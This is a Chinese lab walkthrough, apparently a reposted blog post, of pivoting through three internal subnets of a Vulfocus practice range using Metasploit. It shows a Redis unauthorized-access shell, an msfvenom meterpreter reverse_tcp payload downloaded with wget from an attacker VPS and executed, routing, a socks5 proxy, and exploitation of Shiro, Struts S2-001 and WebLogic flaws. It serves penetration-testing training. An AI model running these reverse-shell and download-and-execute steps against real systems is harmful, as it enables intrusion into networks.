MSF内网漫游

1337163122

​MSF内网漫游 (qq.com)
MSF内网漫游原创 夏天 [url=]moonsec[/url] 昨天
收录于话题#渗透测试 免杀 红队22个


MSF内网漫游

​

1
环境介绍

       
•         简单介绍：
  
  

拓扑图：

​

靶场介绍：centos7(docker)(虚拟机网卡Wmnet8)(IP:192.168.58.128)，docker镜像vulfocus，内网IP网段(10.0.0.0/24)(20.0.0.0/24)(30.0.0.0/24)
攻击机：windows10(虚拟机网卡Wmnet8)(IP:192.168.58.1)，VPS(在公网里的云主机)(有公网IP)

       
•         搭建过程
  
  

Vm虚拟机安装centos7，安装docker
Vulfocus，链接：https://github.com/fofapro/vulfocus
Vulfocus安装配置链接都有说
2
所用工具
Msfconsole，Proxifier，Nmap，NC，proxychains，各种漏洞利用工具
3
漫游开始

​

很详细的msf漫游哦~

       
•         正片开始
  
  

​

边界服务器的地址为：192.168.58.128:13007
使用nmap探测服务

       
• 
  

nmap-sT -sV -Pn -n -p13007 192.168.58.128 -T4 –open

​

Redis服务测试，redis未授权漏洞

​

测试存在后我们直接弹ncshell
拿到了第一个flag

​

ifconig发现了第一个内网网段为：10.0.0.0/24

​

为了方便我们就使用msf上线的方式做内网代理
在VPS上开启msfconsole

​

生成linux木马

       
• 
  

msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=999-f elf > shell.elf


在MSF上配置监听
​

1. use exploit/multi/handler
   
2. set payload linux/x86/meterpreter/reverse_tcp
   
3. set lhost 0.0.0.0
   
4. setl port 999

复制代码

​

​

使用python3-m http.server 8008开启web服务器供下载linux马
​

1. wget http://xxxxxxxxxxxx:8008/shell.elf
   
2. chmod+x shell.elf
   
3. ./shell.elf

复制代码

​

​

成功上线

​

查看路由

​

添加路由routeadd 10.0.0.0  255.255.255.0 1(routeadd [目标网段][掩码][sessions id])

​

使用MSF开启socks5代理
useauxiliary/server/socks_proxy

​

配置Proxifier代理
​
代理java，用为后面所用的工具使用都是java写的

​

代理隧道搭建好之后开始nmap扫描内网主机

       
• 
  

nmap -sT -sV -Pn -n -p1-65535 10.0.0.0/24 -T4– open
(注意：一定要禁ping扫描，socks5不代理icmp流量)
扫描时间过长就先跳过
10.0.0.0/24内网另外一台机器的IP：10.0.0.3端口：8080
代理cmd.exenmap扫描目标8080端口的服务
(右击cmd.exe->选择Proxysocks xxx.xxx.xxx.xxx)

​

       
• 
  

nmap-sT -sV -Pn -n -p8080 10.0.0.3 -T4 –open

​
代理给到浏览器访问一下
两种方式一种像上面cmd.exe一样右击选择即可
另外一种就是用浏览器插件(SwitchyOmega)
​

​

看来是Shiro反序列化的漏洞
上工具一把梭
(注：这里打开工具是在cmd下java–jar xxx.jar，我这里不知道为什么双击打开的不走Proxifier代理)
也可以使用工具内的代理

​

Ipa看到了20.0.0.0/24的网段

​

还是使用wget上马并执行msf代理20.0.0.0网段
wgethttp://xxxxxxxxxx:8008/shell.elf

​

​

​

在这里20.0.0.0走的还是的上面配置的socks5代理
一个代理通两个网段，MSF才是yyds
还是使用nmap扫描20.0.0.0/24网段，时间长我们跳过
20.0.0.0/24网段内的主机IP：20.0.0.2端口：8080

​

这里是S2-001的洞，上工具一把梭

​

​

在这里找到了第三层网段30.0.0.0/24

​

照旧上MSF(解释一下这里为什么要做三层内网的靶场，因为两层的代理用代理工具套娃就可，但代理工具套娃只限于内网工具的多少，而MSF一条路由全部搞定)

​

这里有一个坑明明是root权限却不能对我们的马加执行权限
解决方法
​

1. chattr -i shell.elf
   
2. chmod +x shell.elf

复制代码

​

​

最后一个目标机器IP：30.0.0.2端口：7001
Weblogic的漏洞

​

​

最后一个拿到flag

​

完结
​